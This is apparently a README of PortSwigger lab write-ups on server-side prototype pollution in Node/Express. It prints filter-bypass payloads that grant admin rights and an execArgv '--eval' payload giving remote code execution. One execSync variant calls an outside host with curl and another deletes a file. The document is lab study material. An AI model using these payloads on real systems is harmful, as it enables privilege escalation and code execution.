rafibz007/Portswigger-Labs/Prototype-pollution/README.md

 Adding `"__proto__":{"status":499}` to the update request and checking all error pages did not reviel any changes in the website behaviour.

 `json spaces` is a property for `ExpressJS`, configuring the json response indentation.
 Adding `"__proto__":{"json spaces":10}` made a website respond with more indent spaces in the response, which solved the lab.

+## Bypassing flawed input filters for server-side prototype pollution

+Again we are looking at `POST /my-account/change-address` request.

+We can notice that any additional param added to the user update request will be reflected.
+For example adding `"b":"a"` will respond with the same field in user description.
+Therefore we can assume that any field the user has, even those inherited from `Object.prototype`, will be reflected here.

+Casually adding `"__proto__":{"foo":"bar"}},` to the request will not result in any response change, The param maybe filtered.

+But `"constructor":{"prototype":{"foo":"bar"}}` does the trick and the response contains additional `"foo":"bar"` param.
+Now as one of the first labs we can grant ourselves the admin privillages by payload `"constructor":{"prototype":{"isAdmin":true}}` and solve the lab.

+The server side prototype pollution Burp scanner was also able to find the vulnerability here.

+## Remote code execution via server-side prototype pollution

+The server side prototype polution scanner was able to find prototype pollution in `POST /my-account/change-address` request, for example by modifying response status code, json indentation etc.

+Manually testing `json spaces` pollution proved that we are able to conduct prototype pollution.

+Once new subproccess is started with `child_process.spawn()` or `child_process.fork()` it uses `execArgv` param with its options.
+If developers did not specify it, we could pollute it.

+Adding `"__proto__":{"execArgv": [   "--eval=require('child_process').execSync('curl https://aaaaaa.free.beeceptor.com')"]}` and running maintanence jobs from admin panel did not made any out-of-bound connections, but they may be blocked by a firewall or `curl` is not available.

+But applying payload `"__proto__":{"execArgv": [   "--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"]}` solves the lab, which proves we have an RCE.

+Due to sollution, out-of-bound connection was possible to Burp Collaborator, but I'm poor, so I had to guess it will work.